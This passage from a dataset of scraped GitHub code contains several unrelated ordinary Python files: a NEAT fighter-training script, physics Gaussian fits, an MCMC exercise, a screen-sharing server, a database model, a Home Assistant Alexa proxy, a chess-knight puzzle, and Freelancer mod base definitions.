return self\n\ndef run(config_file, load_p = None, n=30):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n if load_p is not None:\n p = load_p\n else:\n p = neat.Population(config)\n # p.run = population_run\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(5))\n\n # Run for up to 300 generations.\n population = population_run(p, eval_genomes, 1, n)\n\n\n return population\n\n\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'neat_config.ini')\n population = None\n population = neat.Checkpointer.restore_checkpoint(os.path.join(local_dir, 'neat-checkpoint-104'))\n population.config.species_elitism = 2\n population.config.compatibility_threshold = 2.3\n # print(population.config.__dict__.keys())\n # print(population.config.__dict__['species_elitism'])\n # assert False\n\n population = run(config_path, load_p= population, n=8000)\n config = population.config\n\n\n print(\"Saving output to out_file\")\n\n with gzip.open('out_file', 'w', compresslevel=5) as f:\n data = population\n pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n all_genomes = list(population.values())\n all_genomes.sort(key=lambda x: x.fitness, reverse=True)\n\n cur_simulator = simulator()\n cur_simulator.create_ai_fighters_from_gennomes(all_genomes[:3], config)\n cur_simulator.run_full_simulation(15, display_sim=True)\n\n\n","repo_name":"twentworth/ai_fighters","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72547322668","text":"\"\"\"Dieses Script führt die Gauss Fits aus und gibt die Winkel der Peaks wieder\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os\nfrom file_management import read_file, FileData, FitResult\nfrom fit import Fit\nimport matplotlib.pyplot as plt\nfrom monke import plots, functions, latex\nfrom typing import Tuple\nfrom dataclasses import dataclass\nimport scienceplots.styles\n\npython_path = os.path.dirname(__file__)\nplt.style.use(\"science\")\nplt.rcParams[\"figure.figsize\"] = [7, 5.5]\n\n\ndef do_gauss_fits() -> pd.DataFrame:\n \"\"\"führt alle Gauss Fits durch und gibt im Array die Winkel der Fit\n Schwerpunkte wieder. Alle Winkel werden in Radianten wiedergegeben\"\"\"\n os.chdir(python_path)\n\n result: pd.DataFrame = pd.DataFrame([])\n current: list[float] = []\n theta_left: list[float] = []\n sd_theta_left: list[float] = []\n theta_middle: list[float] = []\n sd_theta_middle: list[float] = []\n theta_right: list[float] = []\n sd_theta_right: list[float] = []\n\n s_l: list[float] = []\n sd_s_l: list[float] = []\n s_m: list[float] = []\n sd_s_m: list[float] = []\n s_r: list[float] = []\n sd_s_r: list[float] = []\n\n fits: list[FileData] = read_file(\"zeeman.txt\")\n for fit in fits:\n current.append(float(fit.name[1:4]))\n\n error = np.array([np.sqrt(i) if np.sqrt(i) > 1 else 1 for i in fit.data[1]]) # Fehler unskaliert\n fit.add_error(error / 3)\n fit.run_fits()\n fitres: FitResult = fit.fitresult\n if len(fitres.x0[0]) != 3:\n print(fitres.x0)\n raise Exception(\"Fehler: im Gauss Fit wurden keine 3 Gausskurven gefittet\")\n\n fig, ax = plt.subplots()\n ax.set_xlabel(r\"$\\theta\\,/\\,^\\circ$\")\n ax.set_ylabel(r\"Intensität $I\\,/\\,\\%$\")\n\n ax.set_xlim(fit.plot_interval)\n ax.errorbar(*fit.data[:2], yerr=fit.data[2], ms=3, linestyle=\"\", marker=\"o\", label=\"Messwerte\")\n for i in fit.result:\n out: Fit = fit.result[i]\n data = out.get_fit_data(out.file_interval.interval, 200)\n ax.plot(*data, label=\"Gauss-Anpassung\")\n\n plots.legend(ax)\n\n # ax.plot()\n os.chdir(python_path)\n fig.savefig(f\"../figs/gauss_{fit.name[:4]}.pdf\", dpi=200)\n # plt.show()\n\n theta_left.append(fitres.x0[0, 0] * np.pi / 180)\n sd_theta_left.append(fitres.x0[1, 0] * np.pi / 180)\n theta_middle.append(fitres.x0[0, 1] * np.pi / 180)\n sd_theta_middle.append(fitres.x0[1, 1] * np.pi / 180)\n theta_right.append(fitres.x0[0, 2] * np.pi / 180)\n sd_theta_right.append(fitres.x0[1, 2] * np.pi / 180)\n\n s_l.append(fitres.std[0, 0] * np.pi / 180)\n sd_s_l.append(fitres.std[1, 0] * np.pi / 180)\n s_m.append(fitres.std[0, 1] * np.pi / 180)\n sd_s_m.append(fitres.std[1, 1] * np.pi / 180)\n s_r.append(fitres.std[0, 2] * np.pi / 180)\n sd_s_r.append(fitres.std[1, 2] * np.pi / 180)\n\n result[\"I\"] = current\n result[\"deg_l\"] = theta_left\n result[\"deg_l_err\"] = sd_theta_left\n result[\"deg_m\"] = theta_middle\n result[\"deg_m_err\"] = sd_theta_middle\n result[\"deg_r\"] = theta_right\n result[\"deg_r_err\"] = sd_theta_right\n result[\"sig_l\"] = s_l\n result[\"sig_l_err\"] = sd_s_l\n result[\"sig_m\"] = s_m\n result[\"sig_m_err\"] = sd_s_m\n result[\"sig_r\"] = s_r\n result[\"sig_r_err\"] = sd_s_r\n return result\n\n\ndef main():\n data = do_gauss_fits()\n\n data.to_csv(\"gauss_fits_zeeman.csv\")\n\n ## erstelle tabelle\n data.iloc[:, 1:] *= 180/np.pi\n with latex.Texfile(\"gauss_fits_zeeman_tabelle\", \"../protokoll/tabellen/\") as file:\n table = latex.Textable(\"Maxima und Standardabweichungen der Gauss-Anpassungen\",\n \"tab:gauss_zeeman_maxima_and_std\", caption_above=True)\n table.fig_mode = \"htb\"\n table.add_header(\n r\"$I / \\unit{\\ampere}$\",\n r\"$x_\\mathrm{links} / \\unit{\\degree}$\",\n r\"$x_\\mathrm{mitte} / \\unit{\\degree}$\",\n r\"$x_\\mathrm{rechts} / \\unit{\\degree}$\",\n r\"$\\sigma_\\mathrm{links} / \\unit{\\degree}$\",\n r\"$\\sigma_\\mathrm{mitte} / \\unit{\\degree}$\",\n r\"$\\sigma_\\mathrm{rechts} / \\unit{\\degree}$\"\n )\n table.add_values(\n list(data.I),\n (list(data.deg_l), list(data.deg_l_err)),\n (list(data.deg_m), list(data.deg_m_err)),\n (list(data.deg_r), list(data.deg_r_err)),\n (list(data.sig_l), list(data.sig_l_err)),\n (list(data.sig_m), list(data.sig_m_err)),\n (list(data.sig_r), list(data.sig_r_err))\n )\n file.add(table.make_figure())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GabrielRemi/P4","sub_path":"V401/python/gauss_fits_zeeman.py","file_name":"gauss_fits_zeeman.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30883823731","text":"import torch as torch\nimport torch.distributions as dist\nimport numpy as np\n\ndef get_mcmc_proposal(mu, sigma):\n \"\"\"\n INPUT:\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n\n OUTPUT:\n q_mu : instance of Distribution class, that defines a proposal for mu\n q_sigma : instance of Distribution class, that defines a proposal for sigma\n \"\"\"\n\n # YOUR CODE HERE\n # we will use the same distributions as the priors.\n\n # how do we find the prior stdv on the mean???\n # CHANGE STDEV OF DIST FIGURE IT OUT\n q_mu = dist.Normal(mu, 1)\n\n q_sigma = dist.Normal(sigma, 0.00001)\n\n return q_mu, q_sigma\n\n\ndef log_joint(mu, sigma, alpha=50, beta=0.5):\n \"\"\"\n INPUT:\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n alpha : scalar, standard deviation of Gaussian prior on mu. Default to 50\n beta : scalar, rate of exponential prior on sigma_i. Default to 0.5\n\n OUTPUT:\n log_joint: the log probability log p(mu, sigma, x | alpha, beta), scalar\n\n NOTE: For inputs where sigma <= 0, please return negative infinity!\n\n \"\"\"\n measurements = torch.FloatTensor([-27.020, 3.570, 8.191, 9.898, 9.603, 9.945, 10.056])\n assert mu.ndim == 0\n assert sigma.shape == (7,)\n\n # YOUR CODE HERE\n\n # we need to find log(p(mu join data join sigma given a and b))\n # we assume mu and sigma are independent\n for elements in sigma:\n if elements <= 0:\n return torch.tensor(-float(\"inf\"))\n\n p_sigma = dist.Exponential(rate=beta).log_prob(sigma)\n p_mu = dist.Normal(0, alpha).log_prob(mu)\n p_data = dist.Normal(mu, sigma).log_prob(measurements)\n\n return torch.sum(p_sigma) + p_mu + torch.sum(p_data)\n\ndef mcmc_step(mu, sigma, alpha=50, beta=0.5):\n \"\"\"\n mu : scalar\n sigma : tensor, vector of length 7. Should have sigma > 0\n alpha : scalar, standard deviation of Gaussian prior on mu. Default to 50\n beta : scalar, rate of exponential prior on sigma_i. Default to 0.5\n\n OUTPUT:\n mu : the next value of mu in the MCMC chain\n sigma : the next value of sigma in the MCMC chain\n accepted : a boolean value, indicating whether the proposal was accepted\n\n \"\"\"\n\n accepted = False\n q_mu, q_sigma = get_mcmc_proposal(mu, sigma)\n\n # YOUR CODE HERE\n # We sample from both distributions\n\n mu_prop = q_mu.sample()\n sigma_prop = q_sigma.sample()\n\n q_mu_prop, q_sigma_prop = get_mcmc_proposal(mu_prop, sigma_prop)\n logjoint_prop = log_joint(mu_prop, sigma_prop)\n logjoint = log_joint(mu, sigma)\n\n logsum = (\n logjoint_prop\n +q_mu_prop.log_prob(mu)\n +torch.sum(q_sigma_prop.log_prob(sigma))\n -logjoint\n -torch.sum(q_sigma.log_prob(sigma_prop))\n -q_mu.log_prob(mu_prop)\n )\n print(type(logsum,),logsum)\n\n A = min(1, torch.exp_(logsum))\n print(A)\n if A.numpy() > np.random.rand():\n accepted = True\n mu = mu_prop\n sigma = sigma_prop\n\n return mu, sigma, accepted\n\nmeasurements = torch.FloatTensor([-27.020, 3.570, 8.191, 9.898, 9.603, 9.945, 10.056])\n\nmu_init = measurements.mean()\nsigma_init = torch.ones(7)\nmcmc_step(mu_init, sigma_init)\n","repo_name":"TheodoreWolf/Msc-Machine-Learning","sub_path":"Modules/COMP0171/7 scientists.py","file_name":"7 scientists.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26890962417","text":"import os\nimport io\nimport time\nimport socket\nimport struct\nimport threading\nfrom PIL import Image\nfrom mss import mss\nfrom time import sleep\nimport numpy as np\nimport json\nimport subprocess\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom mss import mss\nimport numpy as np\n\nactive_screencasts = {}\nrunning_programs = []\n\ndef capture_and_send_screen(monitor_id, server_socket, stop_event):\n conn, _ = server_socket.accept()\n print(f\"Client connected. Screen sharing started.\")\n sct = mss()\n\n # Get the monitor\n monitor = sct.monitors[monitor_id]\n\n while not stop_event.is_set():\n try:\n screen = np.array(sct.grab(monitor))\n img = Image.fromarray(screen)\n buf = io.BytesIO()\n img.convert('RGB').save(buf, format='JPEG')\n byte_im = buf.getvalue()\n\n # Send the size of the data first\n size = len(byte_im)\n size = struct.pack('>L', size)\n conn.sendall(size)\n\n time.sleep(0.01)\n\n # Now send the image data\n conn.sendall(byte_im)\n time.sleep(0.1)\n except BrokenPipeError:\n print(\"Client disconnected, stopping screencast.\")\n break\n\n server_socket.close()\n\ndef start_background(port):\n server_socket = socket.socket()\n server_socket.bind((\"0.0.0.0\", port))\n server_socket.listen(0)\n\n print(f\"Screen background service on port {port}.\")\n\n stop_event = threading.Event()\n screencast_thread = threading.Thread(target=handle_monitor_list_request, args=(server_socket, stop_event))\n screencast_thread.start()\n\n active_screencasts[port] = (screencast_thread, stop_event, server_socket)\n\ndef start_screencast(monitor_id, port):\n server_socket = socket.socket()\n server_socket.bind((\"0.0.0.0\", port))\n server_socket.listen(0)\n\n print(f\"Screen sharing service started on port {port}. Waiting for client connection.\")\n\n stop_event = threading.Event()\n screencast_thread = threading.Thread(target=capture_and_send_screen, args=(monitor_id, server_socket, stop_event))\n screencast_thread.start()\n\n active_screencasts[port] = (screencast_thread, stop_event, server_socket)\n\ndef stop_screencast(port):\n if port in active_screencasts:\n _, stop_event, server_socket = active_screencasts[port]\n stop_event.set() # Signal the thread to stop\n server_socket.close()\n del active_screencasts[port]\n print(f\"Service stopped on port {port}.\")\n else:\n print(f\"No active screen sharing on port {port}.\")\n\n# def list_monitors(conn):\n# sct = mss()\n# monitor_list = [{\"id\": i, \"info\": monitor} for i, monitor in enumerate(sct.monitors)]\n# conn.sendall(json.dumps(monitor_list).encode())\n\ndef list_monitors(conn):\n monitors = mss().monitors\n print(f\"Listing monitors.\")\n if conn:\n monitor_list = [{\"id\": i, \"info\": monitor} for i, monitor in enumerate(monitors)]\n conn.sendall(json.dumps(monitor_list).encode())\n else:\n print(monitors)\n for i, monitor in enumerate(monitors[1:], start=1): # Exclude the first monitor as it's the \"All in One\" monitor\n print(f\"Monitor {i}: {monitor}\")\n\ndef handle_monitor_list_request(server_socket, stop_event):\n while not stop_event.is_set():\n try:\n conn, _ = server_socket.accept()\n data = conn.recv(1024)\n command = data.decode('utf-8').strip()\n if command == \"list\":\n list_monitors(conn)\n elif command == \"add\":\n add_program(conn)\n elif command == \"remove\":\n remove_program(conn)\n conn.close()\n except socket.error:\n break\n server_socket.close()\n\ndef add_last_screen():\n time.sleep(1.5)\n last_monitor = len(mss().monitors) - 1\n start_screencast(int(last_monitor), 9999 + int(last_monitor))\n\ndef add_program(conn):\n global running_programs\n print(f\"Adding screen.\")\n monitor_serial = int(time.time())\n command = ['nohup', './createdummy', f'serial={monitor_serial}', f'name={monitor_serial}', '&']\n program = subprocess.Popen(command, start_new_session=True)\n running_programs.append(program)\n conn.sendall(str(len(running_programs)).encode())\n add_last_screen()\n\ndef remove_program(conn):\n global running_programs\n print(f\"Removing screen.\")\n if running_programs:\n program = running_programs.pop()\n try:\n os.killpg(os.getpgid(program.pid), signal.SIGTERM)\n except ProcessLookupError:\n pass\n conn.sendall(str(len(running_programs)).encode())\n\n\n\n\n\n\n\ndef main():\n def start_screencast_from_gui():\n selected_monitor_id = monitor_var.get()\n if selected_monitor_id == \"\":\n messagebox.showerror(\"Error\", \"Please select a monitor before starting the screencast.\")\n return\n start_screencast(int(selected_monitor_id), 9999 + int(selected_monitor_id))\n\n # Get monitor list\n sct = mss()\n monitors = sct.monitors\n\n # Create a new tkinter window\n root = tk.Tk()\n root.geometry(\"600x300\")\n\n # Add title to the window\n root.title(\"VR Project - Select a Monitor\")\n\n # Create a StringVar to hold the selected monitor ID\n monitor_var = tk.StringVar()\n\n # Create and pack a radio button for each monitor\n for i, monitor in enumerate(monitors[1:], start=1):\n # Capture screenshot of the monitor\n screenshot = sct.grab(monitor)\n # Convert screenshot to PIL Image\n img = Image.fromarray(np.array(screenshot))\n # Resize the image to fit into the GUI\n img = img.resize((150, 100), Image.ANTIALIAS)\n \n\n # Convert PIL Image to PhotoImage\n photo = ImageTk.PhotoImage(img)\n\n monitor_frame = tk.Frame(root)\n monitor_frame.pack()\n\n monitor_label = tk.Label(monitor_frame, image=photo)\n monitor_label.image = photo # Keep a reference to prevent garbage collection\n monitor_label.pack(side=\"left\", padx=10, pady=10)\n\n\n tk.Radiobutton(\n monitor_frame, text=f\"Monitor {i}\", variable=monitor_var, value=i\n ).pack(side=\"right\")\n\n # Create and pack a start button\n start_button = tk.Button(root, text=\"Start Screencast\", command=start_screencast_from_gui)\n \n start_button.pack()\n\n\n # Run the tkinter main loop\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"RavinduTharanga/DESKTOP_VR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41905797357","text":"# coding=utf-8\n\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import Integer, Column, Text, DateTime, String\nfrom . import ModelBase, session\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom ..exceptions import Error\nfrom datetime import datetime\n\n\nclass Document(ModelBase):\n __tablename__ = \"document\"\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n uid = Column(Integer)\n doc_name = Column(String(45))\n text = Column(Text)\n created_at = Column(DateTime, default=datetime.now)\n updated_at = Column(DateTime, default=datetime.now, onupdate=datetime.now)\n\n @classmethod\n def get(cls, uid):\n return cls.query.filter_by(uid=uid).all()\n\n @classmethod\n def get_content_by_doc_id(cls, doc_id):\n doc = cls.query.filter_by(id=doc_id).one()\n return doc.text\n\n @classmethod\n def add(cls, doc_data):\n doc = cls(**doc_data)\n session.add(doc)\n try:\n session.commit()\n except IntegrityError as e:\n if e.orig[0] == 1062:\n raise Error(Error.DOC_EXISTED)\n return doc\n\n @classmethod\n def delete(cls, doc_id):\n doc = cls.query.filter_by(id=doc_id)\n if doc.first():\n doc.delete()\n session.commit()\n else:\n raise Error(Error.DOC_NOT_FOUND)\n\n @classmethod\n def update(cls, id, text):\n doc = session.query.filter_by(id=id)\n try:\n doc.one().text = text\n session.commit()\n except NoResultFound:\n raise Error(Error.DOC_NOT_FOUND)\n\n\n\n","repo_name":"docloud/docmanage","sub_path":"docmanage/docmanage/models/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36345311900","text":"import os\nimport json\nimport logging\nimport requests\n\nlogger = logging.getLogger()\n\n\nclass HomeAssistant(object):\n def __init__(self, config):\n self.config = config\n\n self.session = requests.Session()\n self.session.headers = {\n 'Authorization': f'Bearer {config.bearer_token}',\n 'content-type': 'application/json',\n 'User-Agent': self.get_user_agent()\n }\n self.session.verify = config.ssl_verify\n self.session.cert = config.ssl_client\n\n def build_url(self, endpoint):\n return f'{self.config.url}/api/{endpoint}'\n\n def get_user_agent(self):\n library = \"Home Assistant Alexa Smart Home Skill\"\n aws_region = os.environ.get(\"AWS_DEFAULT_REGION\")\n default_user_agent = requests.utils.default_user_agent()\n return f\"{library} - {aws_region} - {default_user_agent}\"\n\n def get(self, endpoint):\n r = self.session.get(self.build_url(endpoint))\n r.raise_for_status()\n return r.json()\n\n def post(self, endpoint, data, wait=False):\n read_timeout = None if wait else 0.01\n try:\n logger.debug(f'calling {endpoint} with {data}')\n r = self.session.post(self.build_url(endpoint),\n data=json.dumps(data),\n timeout=(None, read_timeout))\n r.raise_for_status()\n return r.json()\n except requests.exceptions.ReadTimeout:\n # Allow response timeouts after request was sent\n logger.debug(\n f'request for {endpoint} sent without waiting for response')\n return None\n\n\nclass Configuration(object):\n def __init__(self, filename=None, opts_dict=None):\n self._json = {}\n if filename is not None:\n with open(filename) as f:\n self._json = json.load(f)\n\n if opts_dict is not None:\n self._json = opts_dict\n\n self.url = self.get_url(self.get(['url', 'ha_url']))\n self.ssl_verify = self.get(['ssl_verify', 'ha_cert'], default=True)\n self.bearer_token = self.get(['bearer_token'], default='')\n self.ssl_client = self.get(['ssl_client'], default='')\n self.debug = self.get(['debug'], default=False)\n\n def get(self, keys, default=None):\n for key in keys:\n if key in self._json:\n return self._json[key]\n return default\n\n def get_url(self, url):\n \"\"\"Returns Home Assistant base url without '/api' or trailing slash\"\"\"\n if not url:\n raise ValueError('Property \"url\" is missing in config')\n\n return url.replace(\"/api\", \"\").rstrip(\"/\")\n\n\ndef event_handler(event, context):\n config = Configuration('config.json')\n if config.debug:\n logger.setLevel(logging.DEBUG)\n ha = HomeAssistant(config)\n\n return ha.post('alexa/smart_home', event, wait=True)\n","repo_name":"mike-grant/haaska","sub_path":"haaska.py","file_name":"haaska.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":512,"dataset":"github-code","pt":"37"} +{"seq_id":"40351886508","text":"nite = list(input())\nx = ord(nite[0])-96\ny = int(nite[1])\nresult = 0\n\ntypes = [(-2,-1), (-2,1), (-1,-2), (-1,2), (1,-2), (1,2), (2,-1), (2,1)]\n\n\nfor type in types:\n nx = x + type[0]; ny = y + type[1]\n if(nx<1 or ny<1 or nx>8 or ny>8):\n continue\n result += 1\nprint(result)","repo_name":"chestnut-Algorithm/thisisCodingTest","sub_path":"implementation/3. 왕실의 나이트.py","file_name":"3. 왕실의 나이트.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71589578029","text":"from universe.system import *\nfrom world.gun import *\nfrom world.equipment import MainMiscEquip as misc\nfrom world.equipment import Equipment\nfrom world.ship import *\n\n\nLEVEL_1 = 1\nLEVEL_2 = 2\nLEVEL_3 = 3\nLEVEL_4 = 3\nLEVEL_5 = 3\nLEVEL_6 = 3\n\nEQUIP_CLASSES_PER_LEVEL = {\n LEVEL_1: [\n Equipment.CLASS_1,\n Equipment.CLASS_4,\n Equipment.CLASS_7,\n ],\n LEVEL_2: [\n Equipment.CLASS_2,\n Equipment.CLASS_5,\n Equipment.CLASS_8,\n ],\n LEVEL_3: [\n Equipment.CLASS_3,\n Equipment.CLASS_6,\n Equipment.CLASS_9,\n ],\n LEVEL_4: [\n Equipment.CLASS_1,\n Equipment.CLASS_3,\n Equipment.CLASS_6,\n Equipment.CLASS_8,\n ],\n LEVEL_5: [\n Equipment.CLASS_2,\n Equipment.CLASS_4,\n Equipment.CLASS_7,\n Equipment.CLASS_9,\n ],\n LEVEL_6: [\n Equipment.CLASS_1,\n Equipment.CLASS_3,\n Equipment.CLASS_5,\n Equipment.CLASS_7,\n ],\n}\n\n\nclass Base(object):\n SHIPS = []\n LEVEL = None\n\n GUN = None\n GUN_LEVEL = None\n\n ENGINE = None\n ENGINE_LEVEL = None\n\n POWER = None\n POWER_LEVEL = None\n\n SHIELD = None\n SHIELD_LEVEL = None\n\n THRUSTER = None\n THRUSTER_LEVEL = None\n\n REWARD_LEVEL = None\n\n REWARD_GUN = None\n REWARD_GUN_LEVEL = None\n\n REWARD_ENGINE = None\n REWARD_ENGINE_LEVEL = None\n\n REWARD_POWER = None\n REWARD_POWER_LEVEL = None\n\n REWARD_SHIELD = None\n REWARD_SHIELD_LEVEL = None\n\n REWARD_THRUSTER = None\n REWARD_THRUSTER_LEVEL = None\n\n subclasses = []\n\n equip_items = []\n\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses.append(cls)\n\n def get_ships(self):\n return self.SHIPS\n\n def get_gun_level(self):\n if self.GUN_LEVEL:\n return self.GUN_LEVEL\n return self.LEVEL\n\n def get_engine_level(self):\n if self.ENGINE_LEVEL:\n return self.ENGINE_LEVEL\n return self.LEVEL\n\n def get_power_level(self):\n if self.POWER_LEVEL:\n return self.POWER_LEVEL\n return self.LEVEL\n\n def get_shield_level(self):\n if self.SHIELD_LEVEL:\n return self.SHIELD_LEVEL\n return self.LEVEL\n\n def get_thruster_level(self):\n if self.THRUSTER_LEVEL:\n return self.THRUSTER_LEVEL\n return self.LEVEL\n\n def get_gun_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_gun_level()]\n\n def get_engine_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_engine_level()]\n\n def get_power_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_power_level()]\n\n def get_shield_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_shield_level()]\n\n def get_thruster_classes(self):\n return EQUIP_CLASSES_PER_LEVEL[self.get_thruster_level()]\n\n\n\n# Planet Bizmark\nclass Bizmark_base(Base):\n NAME = 'Bizmark_base'\n SYSTEM = rh_biz\n SHIPS = [\n Dagger,\n Dromader,\n Stiletto,\n ]\n\n LEVEL = LEVEL_6\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n\n# Bremen Traders\nclass rh_biz_02_Base(Base):\n NAME = 'rh_biz_02_Base'\n SYSTEM = rh_biz\n SHIPS = [\n Humpback,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Battleship\nclass rh_biz_03_Base(Base):\n NAME = 'rh_biz_03_Base'\n SYSTEM = rh_biz\n SHIPS = [\n Valkyrie,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHeavygun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# Scient\nclass rh_biz_04_Base(Base):\n NAME = 'rh_biz_04_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandShieldgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Military Base (Kologne)\nclass rh_biz_05_Base(Base):\n NAME = 'rh_biz_05_Base'\n SYSTEM = rh_biz\n SHIPS = [\n # ???\n ]\n\n LEVEL = LEVEL_4\n\n GUN = RheinlandHeavygun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# West Pirates\nclass rh_biz_06_Base(Base):\n NAME = 'rh_biz_06_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHessiangun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# East Pirates\nclass rh_biz_07_Base(Base):\n NAME = 'rh_biz_07_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandPirategun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Starke Largestation\nclass sig8_01_Base(Base):\n NAME = 'sig8_01_Base'\n SYSTEM = sig8\n\n LEVEL = LEVEL_4\n\n GUN = RheinlandLightgun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# Junker Station\nclass sig8_02_Base(Base):\n NAME = 'sig8_02_Base'\n SYSTEM = sig8\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Police outpost\nclass sig8_04_Base(Base):\n NAME = 'sig8_04_Base'\n SYSTEM = sig8\n SHIPS = [\n Banshee,\n ]\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# mining space shipping\nclass om15_01_Base(Base):\n NAME = 'om15_01_Base'\n SYSTEM = om15\n SHIPS = [\n CSV_Mk2,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# junkers\nclass om15_03_Base(Base):\n NAME = 'om15_03_Base'\n SYSTEM = om15\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Traders\nclass om15_04_Base(Base):\n NAME = 'om15_04_Base'\n SYSTEM = om15\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\nclass om15_miner_01(Base):\n NAME = 'om15_miner_01'\n SYSTEM = om15\n\n\nclass om15_miner_02(Base):\n NAME = 'om15_miner_02'\n SYSTEM = om15\n\n\nclass om15_miner_03(Base):\n NAME = 'om15_miner_03'\n SYSTEM = om15\n\n\nclass rh_stut_01_Base(Base):\n NAME = 'rh_stut_01_Base'\n SYSTEM = rh_stut\n SHIPS = [\n Banshee,\n # Humpback2,\n Sabre,\n ]\n\n\nclass rh_stut_02_Base(Base):\n NAME = 'rh_stut_02_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_03_Base(Base):\n NAME = 'rh_stut_03_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_04_Base(Base):\n NAME = 'rh_stut_04_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_05_Base(Base):\n NAME = 'rh_stut_05_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_06_Base(Base):\n NAME = 'rh_stut_06_Base'\n SYSTEM = rh_stut\n\n\n# Berlin \nclass rh_ber_01_Base(Base):\n NAME = 'rh_ber_01_Base'\n SYSTEM = rh_ber\n SHIPS = [\n Starflier2,\n CSV,\n Starblazer,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Prison\nclass rh_ber_02_Base(Base):\n NAME = 'rh_ber_02_Base'\n SYSTEM = rh_ber\n\n LEVEL = 